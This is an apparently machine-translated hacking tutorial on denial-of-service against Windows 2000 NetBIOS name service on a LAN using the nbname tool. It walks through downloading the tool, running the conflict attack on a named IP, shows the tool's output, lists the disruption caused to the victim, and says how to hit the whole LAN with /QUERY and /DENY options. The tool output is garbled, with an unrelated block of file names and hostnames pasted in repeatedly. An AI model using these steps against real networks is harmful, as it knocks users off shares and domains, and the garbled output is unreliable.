Attack Dos In Lan

Attack Dos In Lan
So far, you have only heard about DoS attacks on the internet, but do not listen to DoS on LAN. There is a tool that can help you do DoS into the Net-BIOS Name Service (NBNS) on win2k machines in the LAN through the NetBIOS protocol. Note: Before using this tool, you must disconnect the TCP / IP protocol's NetBIOS service to avoid conflicts with the current NBNS service (watch out for his backdoor ;-)). Ok, now you download nbname at download.tungxeng.net.ms. Unzip and try to attack the guy 192.168.234.222 star (nbname runs in DOS): CODE C: nbname / astat 192.168.234.222 / conflict NBName v1.9 - Decodes and displays NetBIOS Name traffic (UDP 137), với tùy chọn Copyright 2000: Sir Dystic, Cult of the Dead Cow -: |: - New Hack City Send complaints, ideas and donations to sd@cultdeadcow.com | sd@newhackcity.net WinSock v2.0 (v2.2) WinSock 2.0 WinSock status: Running Bật vào cổng 137 trên address 192.168.234.244 Broadcast address 192.168.234.255 Netmask: 255.255.255.0 1 AzSoft_watermark_small.png cong-nghe? P = 1 des.txt en_metadesc.txt en_name.txt getpageinfo.sh getpagelink.sh imglink.txt imglist.txt img.AzSoft.com label: Some Text link_original.txt link.txt log.txt meta_desc.txt name.txt news t-142619 testimg2-0.jpg testimg2-1.jpg testimg2.jpg testimg3.jpg testimg.jpg thumb tim-hieu-excel-2016-200.jpg title_vn.txt tmp02.html tmp03.html tmp2.html tmpdesc2.txt tmpdesc3.txt tmpdesc4.txt tmpdesc5.txt tmpdesc6.txt tmpdesc7.txt tmpdesc.txt tmp.html tmpresult.txt tmptrans.txt transresult.txt wm.AzSoft.com www.mailenable.com www .microsoft.com NBSTAT QUERY packet sent to 192.168.234.222 Waiting for packets ... 1 AzSoft_watermark_small.png cong-nghe? P = 1 des.txt en_metadesc.txt en_name.txt getpageinfo.sh getpagelink.sh imglink.txt imglist.txt img.AzSoft.com label: Some Text link_original.txt link.txt log.txt meta_desc.txt name.txt news t-142619 testimg2-0.jpg testimg2-1.jpg testimg2.jpg testimg3.jpg testimg.jpg thumb tim-hieu-excel-2016-200.jpg title_vn.txt tmp02.html tmp03.html tmp2.html tmpdesc2.txt tmpdesc3.txt tmpdesc4.txt tmpdesc5.txt tmpdesc6.txt tmpdesc7.txt tmpdesc.txt tmp.html tmpresult.txt tmptrans.txt transresult.txt wm.AzSoft.com www.mailenable.com www .microsoft.com Received 301 bytes from 192.168.234.222:137 via local net at Web Jun 20 15:46:12 200 OPCode: QUERY Flags: Response AuthoratAnswer Answer [0]: 1 AzSoft_watermark_small.png cong-nghe? P = 1 des.txt en_metadesc.txt en_name.txt getpageinfo.sh getpagelink.sh imglink.txt imglist.txt img.AzSoft.com label: Some Text link_original.txt link.txt log.txt meta_desc.txt name.txt news t-142619 testimg2-0.jpg testimg2-1.jpg testimg2.jpg testimg3.jpg testimg.jpg thumb tim-hieu-excel-2016-200.jpg title_vn.txt tmp02.html tmp03.html tmp2.html tmpdesc2.txt tmpdesc3.txt tmpdesc4.txt tmpdesc5.txt tmpdesc6.txt tmpdesc7.txt tmpdesc.txt tmp.html tmpresult.txt tmptrans.txt transresult.txt wm.AzSoft.com www.mailenable.com www .microsoft.com <00> Node Status Resource Record: MANDALAY <00> ACTIVE UNIQUE NOTPERM INCONFLICT NOTDEREGED B-NODE MANDALAYFS <00> ACTIVE GROUP NOTPERM NOCONFLICT NOTDEREGED B-NODE 1 AzSoft_watermark_small.png cong-nghe? P = 1 des.txt en_metadesc.txt en_name.txt getpageinfo.sh getpagelink.sh imglink.txt imglist.txt img.AzSoft.com label: Some Text link_original.txt link.txt log.txt meta_desc.txt name.txt news t-142619 testimg2-0.jpg testimg2-1.jpg testimg2.jpg testimg3.jpg testimg.jpg thumb tim-hieu-excel-2016-200.jpg title_vn.txt tmp02.html tmp03.html tmp2.html tmpdesc2.txt tmpdesc3.txt tmpdesc4.txt tmpdesc5.txt tmpdesc6.txt tmpdesc7.txt tmpdesc.txt tmp.html tmpresult.txt tmptrans.txt transresult.txt wm.AzSoft.com www.mailenable.com www .microsoft.com Name release sent to 192.168.234.222 .... Consequences of the DoS for the victim: 1. Network connection malfunction 2. Deactivating network functions (eg Network Neighborhood function) 3. Can not use net send function 4. Trouble connecting to domain 5. Unable to access shared resources 6. Sick NetBIOS sevice Use the nbtstat -n command to get a Conflict notification panel as follows: CODE LAN: Node IpAddress: 1 Scope Id: [] NetBIOS Local Name Table Tên Type Status ---------------------------------------------- ------------------ MANDALAY <00> UNIQUE Conflict MANDALAYFS <00> GROUP Registered MANDALAYFS <1c> GROUP Registered MANDALAY <20> UNIQUE Conflict MANDALAYFS <1e> GROUP Registered MANDALAY <1d> UNIQUE Conflict .... You can attack the entire LAN by adding the / QUERY, / DENY parameter. You type nbname / 1 to refer to the enclosed parameter of nbname. huutung